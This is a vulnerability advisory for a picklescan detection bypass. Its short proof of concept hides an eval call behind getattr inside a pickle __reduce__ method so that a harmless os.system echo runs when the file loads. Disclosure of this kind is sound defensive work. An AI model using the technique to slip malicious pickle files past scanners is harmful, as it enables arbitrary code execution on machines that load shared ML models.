PT-2026-7958 · Pypi · Picklescan
Publicado
2026-02-02
·
Atualizado
2026-02-02
CVSS v4.0
8.9
Alta
| Vetor | AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P |
Summary
An unsafe deserialization vulnerability allows any unauthenticated user to execute arbitrary code on the host loading a pickle payload from an untrusted source.
Details
It's possible to hide the
eval call nested under another callable via getattr.PoC
python
import builtins
class EvilClass:
@staticmethod
def obfuscated eval(payload):
getattr(builtins, "eval")(payload)
def reduce (self):
payload = " import ('os').system('echo "successful attack"')"
return self. obfuscated eval, (payload,)Impact
Who is impacted?
Any organization or individual relying on picklescan to detect malicious pickle files from untrusted sources.
What is the impact?
Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.
Supply Chain Attack: Attackers can distribute infected pickle files to system that load serialized ML models, APIs, or saved Python objects from untrusted sources.
Correção
Deserialization of Untrusted Data
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Enumeração de Fraquezas
Identificadores relacionados
Produtos afetados
Picklescan